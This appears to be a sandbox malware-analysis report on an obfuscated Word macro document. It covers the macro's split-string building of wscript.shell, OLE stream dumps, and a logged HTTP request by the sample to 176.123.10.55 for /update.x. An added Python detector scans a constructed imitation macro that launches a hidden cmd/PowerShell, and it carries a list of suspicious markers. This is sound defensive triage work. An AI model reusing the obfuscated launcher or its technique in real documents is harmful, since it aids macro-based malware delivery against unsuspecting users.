"canalwait" Selection.Delete VB_TemplateDerived 'nclpvluhoejqsnfg 'muffintrade blastfresh alarmtwenty CreateObject(bniufpymjhe()) 'vcuhwdxxp "xlwkuzszwjniijjjg" bniufpymjhe() insidemiracle 'dumbraise elementwalk "mvxcaotsvuwxbyjlh" Z/LqfJ yjsgwogvzwkzqn
VBA Code
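The two keyword lists show the macro's obfuscation style rather than its logic: identifiers and comment lines are random concatenations of dictionary words, decoy string literals sit inside comments, and the argument to CreateObject() is produced by a function (bniufpymjhe) that assembles it at run time from fragments such as "wscr", "ipt." and "shell", with Mid, Len and Join calls doing further splicing, so that no single literal in the stream reads wscript.shell. Document_Open() is the trigger, and Module1 holds the .Run call (jbxaykeetysymgufg.Run). The script below is an added example, not the macro's source (the report prints none) and not sandbox code: it applies a fragment-reassembly heuristic to a constructed VBA snippet that imitates this pattern, reusing identifier names from the keyword lists; the Run argument in the snippet is invented for illustration.

```python
"""Static triage of split-string VBA obfuscation.

Added example.  SAMPLE_VBA is a constructed snippet that imitates the
pattern visible in the report's keyword lists; it is not the real macro.
"""
import re

SAMPLE_VBA = '''
Private Function bniufpymjhe()
    bniufpymjhe = "wscr" & "ipt." & "shell"
End Function
Private Sub Document_Open()
    Dim jbxaykeetysymgufg As Object
    'svnfkokzcvugwy "pevlzgbjpokk" decoy literal inside a comment
    Set jbxaykeetysymgufg = CreateObject(bniufpymjhe())
    jbxaykeetysymgufg.Run "cmd.e" & "xe /c " & "power" & "shell -w hidden", 0, False
End Sub
'''

# Markers a reassembled literal should never contain in a benign document macro.
SUSPICIOUS = ("wscript.shell", "shell.application", "powershell", "cmd.exe",
              "http://", "https://", ".exe", "-ep bypass", "-w hidden")


def strip_comments(code):
    """Drop VBA comments: an apostrophe outside a string literal runs to end of line."""
    out = []
    for line in code.splitlines():
        in_str, kept = False, []
        for ch in line:
            if ch == '"':
                in_str = not in_str          # "" inside a literal toggles twice, net zero
            elif ch == "'" and not in_str:
                break
            kept.append(ch)
        out.append("".join(kept))
    return "\n".join(out)


def extract_strings(code):
    """Merge `"a" & "b"` chains (also across `_` line continuations), then list literals."""
    merged = re.sub(r'"\s*&\s*(?:_\s*)?"', "", strip_comments(code))
    return [m.replace('""', '"') for m in re.findall(r'"((?:[^"]|"")*)"', merged)]


def scan(code):
    """Return reassembled literals, suspicious markers found, and decoy-comment count."""
    strings = extract_strings(code)
    blob = "".join(strings).lower()      # also catches fragments split across variables
    hits = sorted({k for k in SUSPICIOUS
                   if any(k in s.lower() for s in strings) or k in blob})
    comment_lines = sum(1 for ln in code.splitlines() if ln.strip().startswith("'"))
    return {"strings": strings, "hits": hits, "comment_lines": comment_lines}


if __name__ == "__main__":
    result = scan(SAMPLE_VBA)
    for s in result["strings"]:
        print("literal:", s)
    print("hits:", result["hits"], "comment lines:", result["comment_lines"])
```

The blob check is the cheap counterpart of what olevba's deobfuscation does in full: a sample that stores "wscr" in one variable and "ipt.shell" in another still leaks the marker when all literals are concatenated in source order. What this heuristic cannot see is a string built by Mid() slices of a longer decoy, as the Mid(gatesponsor, ...) and Len(gatesponsor) keywords above suggest this macro also does; for that, run the macro under an emulator or read the deobfuscated call from the sandbox's process tree, which is exactly what the Startup section provides here.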
Streams
Stream Path: \x1CompObj, File Type: data, Stream Size: 114
General
Stream Path: \x1CompObj
File Type: data
Stream Size: 114
Entropy: 4.2359563651
Base64 Encoded: True
Data ASCII: ...... F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q ......
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: FoxPro FPT, blocks size 512, next free block index 4278124544
Stream Size: 4096
Entropy: 0.244287490812
Base64 Encoded: False
Data ASCII: ...... + , . . 0 ...... h ...... p ...... | ......
Data Raw: fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: FoxPro FPT, blocks size 512, next free block index 4278124544
Stream Size: 4096
Entropy: 0.430807633551
Base64 Encoded: False
Data ASCII: ...... O h . . . . . + ' . . 0 . . . h ...... $ ...... 0 ...... < ...... H ...... P ...... X ...... ` ...... U s e r ......
Data Raw: fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00
Stream Path: 1Table, File Type: data, Stream Size: 6579
General
Stream Path: 1Table
File Type: data
Stream Size: 6579
Entropy: 5.97339037308
Base64 Encoded: True
Data ASCII: j ...... 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw: 6a 04 0f 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
Stream Path: Data, File Type: data, Stream Size: 108224
General
Stream Path: Data
File Type: data
Stream Size: 108224
Entropy: 7.96508540724
Base64 Encoded: True
Data ASCII: . . . . D . d ...... > ...... \\ ...... C . . . 8 . . . . A ...... c . a . p . t . u . r . e . 1 . . - . . C . o . p . y ...... b ...... { . u . . , D B . . " > . v ...... D ...... n ...... { . u . . , D B . . " > . v . . . . P N G ...... I H D R . . .
Data Raw: b2 e2 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 3e 13 0b f9 02 f9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 5c 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 38 00 00 00 04 41 01 00 00 00 05 c1 20 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 63 00 61 00
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 409
General
Stream Path: Macros/PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 409
Entropy: 5.33185196595
Base64 Encoded: True
Data ASCII: I D = " { 8 2 8 5 F A 5 A - 7 7 C 1 - 4 0 7 7 - 8 D 1 2 - F C 3 D 1 A 2 6 A C 4 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 A 8 8 5 3 8 8 3 8 8 C 3 8 8 C 3 8 8 C 3 8 8 C " . . D P B = " 7 3 7 1 A A A 3 9 2 A 4 9 2 A 4 9 2 " . . G C = " 5 C 5 E 8 5 D E 8 7 C 6 8 8 C 6 8 8 3 9 " . . . . [ H o s t
Data Raw: 49 44 3d 22 7b 38 32 38 35 46 41 35 41 2d 37 37 43 31 2d 34 30 37 37 2d 38 44 31 32 2d 46 43 33 44 31 41 32 36 41 43 34 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65
General
Stream Path: Macros/PROJECTwm
File Type: data
Stream Size: 65
Entropy: 3.27802992751
Base64 Encoded: False
Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw: 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5497
General
Stream Path: Macros/VBA/_VBA_PROJECT
File Type: data
Stream Size: 5497
Entropy: 5.06905804277
Base64 Encoded: False
Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw: cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 569
General
Stream Path: Macros/VBA/dir
File Type: data
Stream Size: 569
Entropy: 6.35701706503
Base64 Encoded: True
Data ASCII: . 5 ...... 0 * . . . . . p . . H . . . . . d ...... P r o j e c t . Q . ( . . @ . . . . . = . . . . . l ...... Q w Z . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C ...... 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F ...... * . \\ C . . . . . m . . .
Data Raw: 01 35 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 09 51 77 5a 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
Stream Path: WordDocument, File Type: data, Stream Size: 4096
General
Stream Path: WordDocument
File Type: data
Stream Size: 4096
Entropy: 1.05529472675
Base64 Encoded: False
Data ASCII: . . . . _ ...... b j b j , E , E ...... 4 . . . N / . . N / ......
Data Raw: ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 03 08 00 00 0e 00 62 6a 62 6a 2c 45 2c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 0e 00 00 4e 2f 00 00 4e 2f 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
Network Behavior
TCP Packets
Timestamp                          Source Port  Dest Port  Source IP      Dest IP
Oct 23, 2017 21:47:18.591574907 CEST  49165        80         192.168.2.2    176.123.10.55
Oct 23, 2017 21:47:18.591598988 CEST  80           49165      176.123.10.55  192.168.2.2
Oct 23, 2017 21:47:18.591640949 CEST  49165        80         192.168.2.2    176.123.10.55
Oct 23, 2017 21:47:18.591969967 CEST  49165        80         192.168.2.2    176.123.10.55
Oct 23, 2017 21:47:18.591979027 CEST  80           49165      176.123.10.55  192.168.2.2
Oct 23, 2017 21:47:19.291038990 CEST  80           49165      176.123.10.55  192.168.2.2
Oct 23, 2017 21:47:19.291075945 CEST  80           49165      176.123.10.55  192.168.2.2
Oct 23, 2017 21:47:19.291152954 CEST  49165        80         192.168.2.2    176.123.10.55
Oct 23, 2017 21:47:19.296128035 CEST  49165        80         192.168.2.2    176.123.10.55
Oct 23, 2017 21:47:19.296144009 CEST  80           49165      176.123.10.55  192.168.2.2
HTTP Request Dependency Graph
176.123.10.55
HTTP Packets
Timestamp                          Source Port  Dest Port  Source IP      Dest IP        Header                  Total Bytes Transferred (KB)
Oct 23, 2017 21:47:18.591969967 CEST  49165        80         192.168.2.2    176.123.10.55  GET /update.x HTTP/1.1  0
Host: 176.123.10.55
Connection: Keep-Alive
Oct 23, 2017 21:47:19.291038990 CEST  80           49165      176.123.10.55  192.168.2.2    HTTP/1.1 404 Not Found  0
Date: Mon, 23 Oct 2017 19:47:19 GMT
Server: Apache
Content-Length: 206
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 64 61 74 65 2e 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii:
Not Found
The requested URL /update.x was not found on this server.